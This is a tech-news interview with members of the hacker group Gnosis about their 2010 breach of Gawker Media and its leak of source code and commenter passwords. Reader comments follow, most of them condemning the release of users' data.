Gnosis on Gawker Hack, Web Security

This past weekend, Gawker Media was dealt a damaging blow when a group that calls itself Gnosis successfully hacked into Gawker’s servers and thereafter released a torrent which contained Gawker’s source code and a database containing 1.3 million Gawker commenters’ usernames, e-mail addresses, and passwords, about a fifth of which Gnosis decrypted. Considering that many people use the same password for multiple web services, this is bad news; this morning, Twitter said that a wave of acai-related spam had been traced to accounts with emails hit by the Gawker leak. Gnosis also gained access to Gawker’s content management system, publishing a taunting post with a link to the torrent on Pirate Bay. (Both the Gawker post and that particular Pirate Bay torrent have since been removed, although the data is out there now.)

In the wake of the attack, Gawker has promised to “[bring] in an independent security firm to improve security across our entire infrastructure. Additionally, we will continue to work with independent auditors to ensure we maintain a reliable level of security, as well as the processes necessary to ensure we maintain a safe environment for our commenters.” However, the attack has alarmed many of its readers, and should be alarming to most people who have transmitted their personal information over the Web. Perhaps even more alarming than the user database hack is the source code leak: Gawker is built on a proprietary, closed-source framework, which its proprietor Nick Denton says ‘underpins his entire empire to this day.’ Blogger Felix Salmon writes that Gawker Media is in the process of trying to transform into a technology company; this is a hard thing to do when your source code is thoroughly compromised.

Geekosystem got in touch with members of Gnosis and discussed what the attacks meant for Gawker Media, web publishers, and everyone who shares unsecured information on the Internet:

Geekosystem: I’m sure you all have been following today’s media coverage of the hack. What do you think was most misreported or underreported? What haven’t people been talking about enough with respect to the attacks that you think they should be talking about?

Gnosis: That answer is easy. The source code. I just read a post on Fox News that dealt entirely with the release of the database. While this is understandable because your average joe reader might not understand the full implications that comes with releasing a sites source code I feel that it could be targeted a bit more. I expect though that the initial frenzy is to do with the database and that will slowly fade into people researching the source (Or rather I hope that this will happen).

Just to spell it out releasing a sites source code is one of the worst things that could happen – the source that runs the site is now public and this means anyone can view how it works, meaning exploits can be found for the code. What is worse is that with a large code base the site owners cannot simply refactor and change large portions of it, they are stuck and often have no choice but to continue running the public code base until a newer, private version is created which can take a long time. They also have to consider that most of their code, which they worked hard on, is effectively dust-binned. Unless they take the open source route, of course.

As with any story things spin out of control and people add their own opinions to the mix. The only sites that we released information to were Mediaite and TNW, which means that everything else is pure speculation and/or opinion. People are talking about security, which is good, and I think it has brought to light the security issues that face both users and sites, and I hope that Gawker and other sites can learn from the mistakes that led to this.

Editor’s note: At roughly the same time as our interview, Gnosis apparently gave an interview to The Next Web containing some additional information, including the number of people in the group (“13 members, with three ‘others’”), the relation between Gnosis’ recent action and Gawker’s spat with 4chan over the summer (none, they say), and why they released user data rather than just sitting on it (“Release is the safest path, as it allows lessons to be learned.”) It’s worth the read.

Geekosystem: You previously mentioned that Gawker used DES [Data Encryption Standard, an outdated hashing algorithm in which only the first eight characters of a password are necessary for login]. What other mistakes do you think that they made that made your attack easier? Nick Denton said today that Gawker Media will be hiring an outside firm to evaluate their properties’ web security; if they hired Gnosis, what would you tell them to change?

Gnosis: They made several mistakes which contributed to their compromise - leaving passwords literally lying around, using the same password for multiple accounts and services (A lot were weed related, perhaps they had been smoking a bit too much and forgot some basic security principles? (GANJA framework anyone?!)). Unfortunately, I am afraid that until Gawker Media *do* hire us we cannot report fully on any of our findings. Sorry Nick!

Geekosystem: [...]Would you care to comment on [Felix Salmon's above-mentioned observation that Gawker may be trying to become a technology company], both in light of the attacks and as a group that knows Gawker’s framework very well now?

Gnosis: Gawker wrote their own framework and a lot of their site is powered by their own code. I personally *hate* PHP with a vengeance, and if I am perfectly honest I could not face myself to study the reams and reams of source code. We did get a good look and feel for the sites internal structure, and it looked sturdy.

Geekosystem: One of the lessons a lot of people seem to have taken from the attacks is that third-party comment systems [Facebook Connect, DISQUS, etc.] are the way to go from a security vantage. Would you agree or disagree?

Gnosis: 3rd party login systems have many advantages over custom built ones, but they also introduce lots of risks. Centralized data is the way forward, I personally love OpenID and such, but I cannot fail to see the security implementations. What if there was a security breach with these systems? Not only would the data be compromised but the integrity of every site that uses the system. Sites often forget (Or don’t want to realize) that they are putting critical parts of their infrastructure into the hands of another company, who might have less stringent security controls. To take this a bit further imagine the damage that would be caused if malicious users managed to replace Google’s analytics javascript file with their own malicious file, that exploited some unknown vulnerability in peoples web browsers? Of course this scenario is a bit extreme, but it is valid nonetheless.

Geekosystem: Can you clarify your relationship with 4chan/Anonymous?

Gnosis: No relationship. Some of our members visit the site, but there are no ties or any form of relationship.

(They said more on this in their most recent interview with TNW: “As for 4chan, we are not directly connected, no. But 4chan’s influence on the net is large and several of our members visit the site. We don’t directly agree with some of 4chans tactics, or rather “anon’s” tactics. We believe that ddosing sites won’t help their cause and will only generate negative press and I personally see in the media a lot of acts being simply put under the umbrella of “4chan” or “anonymous”. We would have not wanted this to be lumped with such acts as DDOS’ing Amazon or Mastercard.”)

Geekosystem: At the end of your readme.txt [the text file which accompanied the torrented leaked data], you wrote, “We’ve not done yet, we have other targets in our sights.” What do you mean by this?

Gnosis: Only time will tell.

Qwerty

Pussies. Why didn’t you ask him about intentionally putting hundreds of thousands of people with no formal ties to Gawker at risk? Why didn’t you ask about the justification for that, why that was necessary.
myname

This. Why harm hundreds of thousands of people completely unassociated with Gawker in order to teach a lesson to the people who manage it? It’s completely irresponsible. If they feel the release of the source code is more significant anyway, why do this?
Anonymous

This is simple curiousity, not an insult, but why is leaking a site’s source so bad? Open source web platforms like WordPress seem fine and no less secure than other CMS’s.
Anonymous

Depends on if they were relying on security-by-obscurity or not. If their code was well-written it may have a handful of easily fixable exploits, and those will definitely come out soon. Other than that, IMO, it’s not a big deal. Proprietary folks treat their source code like their private parts, but really it’s nothing to be cagey about. Some delude themselves into thinking they’ve done something special and are terrified that if their ub3r s3cr3ts get out their livelihood will disappear in a puff of smoke, but that is utter nonsense anyway. I am interested to see their implementation though and will be poking through the source. Doubt I’ll find anything of much interest. Blogs are blogs are blogs.
Anonymous

Depends on if they were relying on security-by-obscurity or not. If their code was well-written it may have a handful of easily fixable exploits, and those will definitely come out soon. Other than that, IMO, it’s not a big deal. Proprietary folks treat their source code like their private parts, but really it’s nothing to be cagey about. Some delude themselves into thinking they’ve done something special and are terrified that if their ub3r s3cr3ts get out their livelihood will disappear in a puff of smoke, but that is utter nonsense anyway. I am interested to see their implementation though and will be poking through the source. Doubt I’ll find anything of much interest. Blogs are blogs are blogs.
not saying

The Gnosis hackers are scumbags. There is no justification for maliciously making people’s e-mail addresses and passwords accessible to any spammer or other party out there. They can do what they like to Gawker if they have some pre-school need to through their tantrum but exposing Gawkers users is tantamount to digital assault.
caught up innocent person

Rediculous. This spokesperson (if you could call this person that) is complaining that Gawker was arrogant and so teached them a lession. And despite putting our information for all to see online, he/she wonders why nobody is interested in the source code?!

I’ll tell you why! You put our usernames and password on the open internet you w******! That’s why! We don’t give a **** about some bleeding source code in comparison!!!

Now, that is arrogance from Gnosis! I hope you all get taught a big lesson, by some big bloke who drops his soap in the shower room! You may think that you are doing everyone a service… wrong. Everyone affected and those not, but seeing the results, just think you are scum for involving us all in this!!

Thanks but no thanks, you have intentionally opened people up to criminals… which we believe you are anyway!
Gonzo

With your source code publicly available, people such as those in this “Gnosis” group, can look through it for your mistakes. If they find ways of using your mistakes against you, you won’t know until it’s too late.

When you put your code under Open Source, people are looking through it for your mistakes, but they’re publishing fixes to them that you can review and implement.

With Closed Source made public, you get the worst of both worlds – the full exposure of Open Source with no help fixing it.
Gonzo

It’s another case of a child with a toy. A mature person would see the problem, attempt to fix it by notifying the company, and if ignored, let their competitors ream them with bad press over the flaw. I’m not even sure if “immature” is sufficient, though, when you start releasing the personal information of users. We are not the programmers who made the mistake, nor is it our responsibility to make sure our choice of websites coincides with the whim of the latest batch of overgrown children who’ve decided that their malicious play is justified simply because they were able to do it.

geekosystem

Sun Continues Impressive Activity, Tosses Coronal Mass Ejections at Earth

The Little Rover That Could: Opportunity Breaks NASA's Driving Distance Record

Want to Be Better at Math? A Jolt of Electricity to the Brain Might Do the Trick

New Pacific Rim Trailer Keeps Us Salivating [Video]

Scissor-Handed Fossil Named in Honor of Johnny Depp, History's Greatest Scissor-Handed Actor

The Gawker Hack and Web Security: The Gnosis Hackers Respond

21 Amazing Minecraft Creations

Sun Continues Impressive Activity, Tosses Coronal Mass Ejections at Earth

How To Make Rage Faces on Facebook Chat

All-Female Species Survives by Stealing DNA of Other Animals

Hemlock Grove: Just the Right Kind of Bad

Joss Whedon Straight Up Confirms Scarlet Witch and Quicksilver for Avengers 2, Because Joss Whedon

Spock vs. Spock Makes for the Greatest Car Ad of All Time [Video]

Kind of a Big Deal: Mathematician Proves Weak Version of Twin Prime Conjecture

Street Artist Uses Graffiti to Converse with the Police

How to Make Google Translate Beatbox

Robert Gibbs Tells Morning Joe Why He Doesn't Read Maureen Dowd: 'Same Column' For 'Last 8 Years'

Selena Gomez and Justin Bieber Kiss Backstage at Billboard Music Awards (PIC)

Taylor Swift Mocks Romantic Past in Billboard Awards Speech - Watch Video!

PHOTOS: Super Sheer And Then Some On The Nakedest Stars At The Billboard Awards

Amazing Footage Of Oklahoma Tornadoes Demolishing Homes, 'Tearing Up Everything In Its Path'

Everything You Need To See From The 2013 Billboard Music Awards In One Place

Moron Gives Himself A Steeler's Logo Tattoo By Writing "Steeers" On His Leg

Patton Oswalt's Star Wars/Marvel Rant Gets An Animated Short Film [VIDEO]

Jalen Rose Makes His Case In Defense Of J.R. Smith And The NBA Clubbing Culture (VIDEO)

Things We Saw Today: Robert Downey Jr. As A Classical Work Of Art

UPDATE: Superfly to Refund GoogaMooga VIP Tickets For Rained-Out Sunday

UPDATE: GoogaMooga Founder Comments On Today's Cancellation